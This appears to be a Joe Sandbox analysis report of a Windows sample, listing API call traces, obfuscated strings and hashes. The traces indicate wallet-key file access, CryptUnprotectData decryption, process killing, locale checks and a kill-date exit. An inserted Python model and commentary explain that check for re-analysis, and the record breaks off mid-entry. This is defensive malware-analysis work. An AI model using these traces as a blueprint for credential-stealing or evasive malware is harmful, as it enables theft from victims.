                                        • FindClose.KERNEL32(000000FF), ref: 0097DEDE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 3334442632-0
                                        • Opcode ID: e7fbd5261f2c649cd9f37dfce4828a945577cb9f8c788f26a2f847c159bd09e9
                                        • Instruction ID: 5fe1b9f7e87148d381f3a80b1ea5057ca6265a18eece34d2994f1ed170e506d4
                                        • Opcode Fuzzy Hash: e7fbd5261f2c649cd9f37dfce4828a945577cb9f8c788f26a2f847c159bd09e9
                                        • Instruction Fuzzy Hash: 94910373A001049BDB14FB74DD96BED737DAFD4300F008669F95A56581EE389B48CB92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: "o}$9a?w$>oo]$Xfgc$o_>]$tWn_$}<M?$oW]$oW]
                                        • API String ID: 0-3147922533
                                        • Opcode ID: 56bda2e1028b7136bd8954a02843f910dc1c74dc5149ce9bd9b9e80ca1690d1d
                                        • Instruction ID: 1e1eec869d1fefbae257569e081fb6c077f0dfcc3b7c5ffabf2a58002cefaef4
                                        • Opcode Fuzzy Hash: 56bda2e1028b7136bd8954a02843f910dc1c74dc5149ce9bd9b9e80ca1690d1d
                                        • Instruction Fuzzy Hash: 8D7249F360C2049FE7046E1DEC8577ABBE9EF94360F1A463DEAC483744E63598058697
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00989905
                                        • Process32First.KERNEL32(00979FDE,00000128), ref: 00989919
                                        • Process32Next.KERNEL32(00979FDE,00000128), ref: 0098992E
                                        • StrCmpCA.SHLWAPI(?,00979FDE), ref: 00989943
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0098995C
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0098997A
                                        • CloseHandle.KERNEL32(00000000), ref: 00989987
                                        • CloseHandle.KERNEL32(00979FDE), ref: 00989993
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                        • String ID:
                                        • API String ID: 2696918072-0
                                        • Opcode ID: 85918d0ecd3a156dde31c3b380f4d36db75dc9b30edb9c0355e0a9581e2035eb
                                        • Instruction ID: fbf9f92416f94c5d74018236a69b7ddead73b8cf65b1a6dc3a1f8b0a2825684d
                                        • Opcode Fuzzy Hash: 85918d0ecd3a156dde31c3b380f4d36db75dc9b30edb9c0355e0a9581e2035eb
                                        • Instruction Fuzzy Hash: 1911EC79A04218EBDB24EFA4DC48BEDB7B9BB49701F00468CF509A6240DB759A84CF90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: #4LI$.iW$6S?\$M.?}$`o]$j{?$x^=_$c;
                                        • API String ID: 0-2911940995
                                        • Opcode ID: 758b122e6a2ea9e6b0085145d0b142317ec9d316d92190ad9b9dca9427446128
                                        • Instruction ID: fae2426060be4d686ab226e30124dbb95c2c6285ea6f20a24d927033921b51a4
                                        • Opcode Fuzzy Hash: 758b122e6a2ea9e6b0085145d0b142317ec9d316d92190ad9b9dca9427446128
                                        • Instruction Fuzzy Hash: 7FB238F3A0C2149FE3046E2DEC8567AFBE9EF94720F16463DEAC4C3744E93598058696
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 7vUw$ZNuz$aSOo$fc~$g-|$4p-$Fe~$~]
                                        • API String ID: 0-472717041
                                        • Opcode ID: cb47f218f7eb69330a95ae2c58dbb51536e4c7cb7898585fe52bf4c7ac73a325
                                        • Instruction ID: e445763578a6158ec6502e07314a133fe69b1a85cc41e2fd16a730a30c881d24
                                        • Opcode Fuzzy Hash: cb47f218f7eb69330a95ae2c58dbb51536e4c7cb7898585fe52bf4c7ac73a325
                                        • Instruction Fuzzy Hash: 5FB2F7F360C204AFE3046E2DEC8567AFBE9EFD4720F1A492DE6C5C7744EA3558018696
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                        • GetKeyboardLayoutList.USER32(00000000,00000000,009905B7), ref: 00987D71
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00987D89
                                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00987D9D
                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00987DF2
                                        • LocalFree.KERNEL32(00000000), ref: 00987EB2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                        • String ID: /
                                        • API String ID: 3090951853-4001269591
                                        • Opcode ID: 9c06c01e084eb034824deb18236bbfb3de0774b4e195b83c33bda48a090b3088
                                        • Instruction ID: 00406f53293b99a570cd1fd7881e3bf37d63a8146dd51f5cadc99e42d724f75e
                                        • Opcode Fuzzy Hash: 9c06c01e084eb034824deb18236bbfb3de0774b4e195b83c33bda48a090b3088
                                        • Instruction Fuzzy Hash: D9413E71940218ABDB24EF94DC99BEEB778FF94700F2045D9E00A66291DB786F84CF61
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00990D79), ref: 0097E5A2
                                        • StrCmpCA.SHLWAPI(?,009915F0), ref: 0097E5F2
                                        • StrCmpCA.SHLWAPI(?,009915F4), ref: 0097E608
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0097ECDF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 433455689-1173974218
                                        • Opcode ID: ad223ec6b7fb524d6d71d4bbf61a566a8e8fd1fe2a294db0663e07a41bdc092d
                                        • Instruction ID: d4ddb7e875e5a88a2d307f371a257215a97735250898083eeb5c4f8ac4dac527
                                        • Opcode Fuzzy Hash: ad223ec6b7fb524d6d71d4bbf61a566a8e8fd1fe2a294db0663e07a41bdc092d
                                        • Instruction Fuzzy Hash: 1012E2729101189BDB18FB60DDA6FED7379BFD4300F4045EAB50A66291EF386B48CB52
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: =R~$ =R~$2Tm7$L]mo$elem$y @m
                                        • API String ID: 0-489510652
                                        • Opcode ID: b0995b0d304f654025e81615e0d3b8fef5a229005e837e919216905471d4f0d2
                                        • Instruction ID: f570abdc1a7b4e6d542a03ca8d07b446a8f4a3e2676ea1a17257c45218db7ca1
                                        • Opcode Fuzzy Hash: b0995b0d304f654025e81615e0d3b8fef5a229005e837e919216905471d4f0d2
                                        • Instruction Fuzzy Hash: F4B238F3A0C2049FE308AE2DEC8577AB7D9EBD4720F1A463DEAC5C7744E97558018692
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: :5t$:kOz$M]}?$V'7;$WykV$sr_3
                                        • API String ID: 0-2097001790
                                        • Opcode ID: 3959baa07f08f4cafb0e94a1df14edf93a3c603847d71f937e416c04ca2b0871
                                        • Instruction ID: ef08ed1dcb85c3745aca0ddb6e0d224f83ccb3f334841e6f4b120bb06d58e255
                                        • Opcode Fuzzy Hash: 3959baa07f08f4cafb0e94a1df14edf93a3c603847d71f937e416c04ca2b0871
                                        • Instruction Fuzzy Hash: CFA23AF3A08214AFE3046E2DEC4567ABBE9EF94720F16853DEAC4C3744E63598058797
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ,'<O$C*|?$Uym/$tKu$r|
                                        • API String ID: 0-3904002088
                                        • Opcode ID: e569ac3a2a7e66ebe699f3c42123f99b7b47ecaf0c25c54cbe52204d91d573f1
                                        • Instruction ID: 474d9f2de51a16c2ddee10f6cae995c1b4b4fcda53a47baa253f1814a1524cdb
                                        • Opcode Fuzzy Hash: e569ac3a2a7e66ebe699f3c42123f99b7b47ecaf0c25c54cbe52204d91d573f1
                                        • Instruction Fuzzy Hash: 58B24AF3A0C2049FE3046E2DEC8567AFBE9EF94720F1A453DEAC487744EA3558058697
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: %qcw$7~o$=^^_$G&X>$u7(
                                        • API String ID: 0-1545840563
                                        • Opcode ID: 3fcdc3456250f4aee2492c911c09fb53143f467e75c82138f7bf21346e7e3838
                                        • Instruction ID: 327a037e50965ce88add4b2ebc521414a031aa495fe69cee933e449580877dd3
                                        • Opcode Fuzzy Hash: 3fcdc3456250f4aee2492c911c09fb53143f467e75c82138f7bf21346e7e3838
                                        • Instruction Fuzzy Hash: CBB215F360C2049FE314AE29EC8577ABBE9EF94320F1A453DEAC4C3744EA3558058697
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: \u$\u${${$}$}
                                        • API String ID: 0-582841131
                                        • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                        • Instruction ID: ed488fff415de4a271605bd681a1fbdd1f794b114f5094fd1cc195f7254276fc
                                        • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                        • Instruction Fuzzy Hash: BA416B12E09BC9C5CB058B7444B12AEBFB22FD6210F6D82EBC49E1F382C774414AD3A5
                                        APIs
                                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0097C971
                                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0097C97C
                                        • lstrcat.KERNEL32(?,00990B47), ref: 0097CA43
                                        • lstrcat.KERNEL32(?,00990B4B), ref: 0097CA57
                                        • lstrcat.KERNEL32(?,00990B4E), ref: 0097CA78
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$BinaryCryptStringlstrlen
                                        • String ID:
                                        • API String ID: 189259977-0
                                        • Opcode ID: 0f14b6ceaa9ffb76e90082583d6df1354cf5d86b4b6ef2f54a3f6b38b4eec014
                                        • Instruction ID: ba0e251b111eff55e1f83966e123b7c20d5327686d5f76cae5bbf9a35c93c335
                                        • Opcode Fuzzy Hash: 0f14b6ceaa9ffb76e90082583d6df1354cf5d86b4b6ef2f54a3f6b38b4eec014
                                        • Instruction Fuzzy Hash: 2B413EB5D0421DDFDB10CFA4DD89BEEB7B8BB88704F1046A8E509A7280D7745A84CF91
                                        APIs
                                        • GetSystemTime.KERNEL32(?), ref: 00986C0C
                                        • sscanf.NTDLL ref: 00986C39
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00986C52
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00986C60
                                        • ExitProcess.KERNEL32 ref: 00986C7A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$System$File$ExitProcesssscanf
                                        • String ID:
                                        • API String ID: 2533653975-0
                                        • Opcode ID: 4dfb38cfedbbd1f5479f13ff9188f546b6f083601f6829ecbf6afb531532a999
                                        • Instruction ID: 196b8d6549da8dffde817577c3f248f1afa5b11ceb00894a9e9f9b7fb5c98ea2
                                        • Opcode Fuzzy Hash: 4dfb38cfedbbd1f5479f13ff9188f546b6f083601f6829ecbf6afb531532a999
                                        • Instruction Fuzzy Hash: 4321CB75D14209ABCF14EFE4E845AEEB7B9FF48300F04852AE506E7250EB749608CB65
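The chain above (GetSystemTime, sscanf, two SystemTimeToFileTime calls, ExitProcess at 00986C7A) has the shape of a kill-date check: a hard-coded date string is parsed, both dates are converted to FILETIME and compared, and the process exits on the wrong side of the comparison. The model below is an added example, not code from the sample or from Joe Sandbox. The report shows only the call sequence, so the 'YYYY-MM-DD' format parse_date() accepts and the "exit once the kill date has passed" direction are assumptions made here for illustration.

```python
"""Model of the GetSystemTime -> sscanf -> SystemTimeToFileTime -> ExitProcess chain at 00986C0C.

Added example for this report, not code from the sample. The date format and the direction
of the comparison are not visible in the report and are assumed here.
"""
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)  # FILETIME counts from here
TICKS_PER_SECOND = 10_000_000                                # one tick is 100 ns


def parse_date(text: str) -> datetime:
    """Stand-in for the sscanf call. Assumed (hypothetical) format: 'YYYY-MM-DD'."""
    year, month, day = (int(part) for part in text.strip().split("-"))
    return datetime(year, month, day, tzinfo=timezone.utc)


def system_time_to_file_time(when: datetime) -> int:
    """What SystemTimeToFileTime yields for a SYSTEMTIME: 100-ns ticks since 1601-01-01 UTC."""
    if when.tzinfo is None:
        when = when.replace(tzinfo=timezone.utc)  # GetSystemTime returns UTC, never local time
    delta = when - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * TICKS_PER_SECOND + delta.microseconds * 10


def file_time_to_iso(ticks: int) -> str:
    """Reverse direction, for reading a 64-bit FILETIME constant pulled from the dump in a debugger."""
    return (FILETIME_EPOCH + timedelta(microseconds=ticks // 10)).strftime("%Y-%m-%dT%H:%M:%SZ")


def should_exit(kill_date: str, now: str) -> bool:
    """True when the modelled chain would reach ExitProcess.

    Assumption: the sample exits once the current date is at or past the kill date. The two
    SystemTimeToFileTime calls in the report convert the two sides of this comparison.
    """
    return system_time_to_file_time(parse_date(now)) >= system_time_to_file_time(parse_date(kill_date))


def sandbox_clock_for(kill_date: str) -> str:
    """Latest day on which the sample still runs under this model: set the VM clock here before re-detonating."""
    return (parse_date(kill_date) - timedelta(days=1)).strftime("%Y-%m-%d")
```

The practical consequence for re-analysis: a sample re-detonated after its kill date exits before any network activity, so if a fresh run produces none of the C2 traffic this report shows, compare the VM clock with the date constant the sscanf call reads and roll the clock back.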
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 009772AD
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 009772B4
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 009772E1
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00977304
                                        • LocalFree.KERNEL32(?), ref: 0097730E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                        • String ID:
                                        • API String ID: 2609814428-0
                                        • Opcode ID: 04d9dd32de887b58917da90a9efb600cf531f1eae14e661d7dacefdd8ce550f7
                                        • Instruction ID: 992faff729134007f3894e6f54b56fc230ee396f9ad4b819189c2d170b3e59c4
                                        • Opcode Fuzzy Hash: 04d9dd32de887b58917da90a9efb600cf531f1eae14e661d7dacefdd8ce550f7
                                        • Instruction Fuzzy Hash: 14010CB5A44308BBDB10DFE8DC46F9EB778BB45B00F108544FB09AB2C0D7B0AA049B64
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009897AE
                                        • Process32First.KERNEL32(00990ACE,00000128), ref: 009897C2
                                        • Process32Next.KERNEL32(00990ACE,00000128), ref: 009897D7
                                        • StrCmpCA.SHLWAPI(?,00000000), ref: 009897EC
                                        • CloseHandle.KERNEL32(00990ACE), ref: 0098980A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
